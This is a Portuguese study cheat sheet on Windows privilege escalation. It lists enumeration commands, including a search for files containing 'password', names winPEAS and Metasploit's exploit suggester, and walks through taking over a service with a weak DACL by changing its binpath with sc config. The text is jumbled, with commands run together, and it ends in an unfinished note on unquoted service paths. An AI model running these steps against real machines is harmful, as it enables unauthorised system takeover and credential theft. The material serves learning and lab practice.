
Meu manual sobre conceitos de escalonamento de privilégios no Windows. Confira minha playlist, link: https://www.youtube.com/playlist?list=PLlrnAg4kKF3puXLI0JyltbNJOC2R2HVFk
Um ponto importante a destacar são os Grupos: qualquer usuário do grupo Administrator nos ajuda a escalar!
whoami /priv - privilégios do usuário atualnet users - lista todos os usuáriosnet user <username> - lista detalhes de um usuário específicoqwinsta - Outros usuários conectados simultaneamentenet localgroup - Grupos disponíveis no sistemanet localgroup <group-name> - lista membros de um grupo específicosysteminfo - fornece todas as informações sobre o SOhostname - nome do host do sistemafindstr /si password *.txt - estamos procurando arquivos que contenham 'password', especialmente em arquivos de textowmic qfe get Caption,Description,HotFixID,InstalledOn - informa sobre os patches de segurança e informações relacionadasnetstat -ano - conexões associadas à máquinaschtasks /query /fo LIST /v - para verificar se há tarefas agendadasdriverquery - lista informações relacionadas aos driverssc query windefend - verifica o serviço de antivírussysteminfo em sua máquina; esse é o único requisito para essa ferramentawmic product get name,version,vendor - isso fornece o nome do produto, a versão e o fabricante (vendor). Esse comando em particular dá uma visualização adequada do que precisamos.wmic service list brief | findstr "Running" e, para obter mais informações sobre o serviço, use sc qc <ServiceName>post/multi/recon/local_exploit_suggester; garanta que sua sessão esteja em segundo plano para que essa ferramenta funcione corretamente, ou você pode simplesmente carregá-la a partir do meterpreter.winpeas.exe --helpsysteminfo e copie-as para um arquivo com extensão .txtAqui vamos tentar identificar serviços com permissões inseguras e, então, podemos tentar explorá-los.
Aqui podemos utilizar o comando winpeas.exe servicesinfo e ver os serviços que são bastante úteis
Uma parte interessante da saída é assim,```
daclsvc(DACL Service)["C:\Program Files\DACL Service\daclservice.exe"] - Manual - Stopped YOU CAN MODIFY THIS SERVICE: ChangeConfig
- Mas para obter mais informações, podemos usar uma ferramenta chamada **accesschk**, que é da Microsoft, executando-a da seguinte forma `accesschk.exe /accepteula -uwcqv <current-user> <service>`, a saída é,```
C:\PrivEsc>accesschk.exe /accepteula -uwcqv user daclsvc
daclsvc
SERVICE_QUERY_STATUS
SERVICE_QUERY_CONFIG
SERVICE_CHANGE_CONFIG
SERVICE_INTERROGATE
SERVICE_ENUMERATE_DEPENDENTS
SERVICE_START
SERVICE_STOP
READ_CONTROL
service_change_config, onde podemos alterar a configuração do serviço.sc qc <service> e depois anote o Binary_path_name (que também pode ser chamado de binpath), que vamos alterar (sorriso maligno)sc config <service> <option>="<value>"sc config daclsvc binpath="<path>" e inicie o serviço sc start daclsvcVulnerable Service: C:\Program Files\Ignite Data\Vuln Service\file.exe
The system will read this path in the following sequence from 1 to 4 to trigger malicous.exe through a writeable directory.